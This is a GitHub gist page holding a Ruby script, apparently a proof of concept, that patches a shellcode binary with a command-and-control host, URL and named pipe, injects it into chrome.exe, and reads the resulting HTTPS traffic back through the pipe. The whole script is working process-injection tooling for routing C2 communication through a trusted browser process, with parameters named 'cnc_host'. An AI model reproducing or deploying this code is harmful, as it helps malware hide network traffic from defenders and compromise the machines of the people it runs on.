Skip to content

Instantly share code, notes, and snippets.

@phikshun
Created May 29, 2012 03:04
Show Gist options
  • Save phikshun/2822260 to your computer and use it in GitHub Desktop.
Save phikshun/2822260 to your computer and use it in GitHub Desktop.
WinInet Shellcode Pipe Test
require 'win32/pipe'
require 'timeout'
require 'injector'
def update_https_code(cnc_host, url, params, pipe)
pipe = "\\\\.\\pipe\\#{pipe}"
url = "#{url}\x00\x00\x00\x00\x00\x00" if url.length < 6
params = "\x00" if params.empty?
pipe_offset = (@https_pipe_code =~ /\\\\\.\\pipe\\fooo/)
url_offset = (@https_pipe_code =~ /\/12345/)
host_offset = (@https_pipe_code =~ /hostname/)
code = @https_pipe_code.dup
0.upto(url.length-1).each do |i|
code[url_offset+i] = url[i]
end
0.upto(cnc_host.length-1).each do |i|
code[host_offset+i] = cnc_host[i]
end
0.upto(pipe.length-1).each do |i|
code[pipe_offset+i] = pipe[i]
end
code += params
code
end
def do_req(cnc_host, url, params)
pipe = random_alpha(4)
code = update_https_code(cnc_host, url, params, pipe)
inject('chrome.exe', code)
data = ''
@t = Thread.start {
pserver = Win32::Pipe::Server.new(pipe,
(Win32::Pipe::PIPE_TYPE_BYTE |
Win32::Pipe::PIPE_READMODE_BYTE |
Win32::Pipe::PIPE_NOWAIT),
(Win32::Pipe::ACCESS_INBOUND |
Win32::Pipe::FILE_FLAG_OVERLAPPED) )
pserver.connect
while !(data =~ /<\/html>/i)
sleep 0.1
data += pserver.buffer if pserver.read
end
pserver.close
}
timeout(60) { @t.join }
Thread.kill(@t)
data
end
@https_pipe_code = File.read('https_shellcode.bin')
puts do_req("https://www.google.com", "/search", "q=lolcat")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment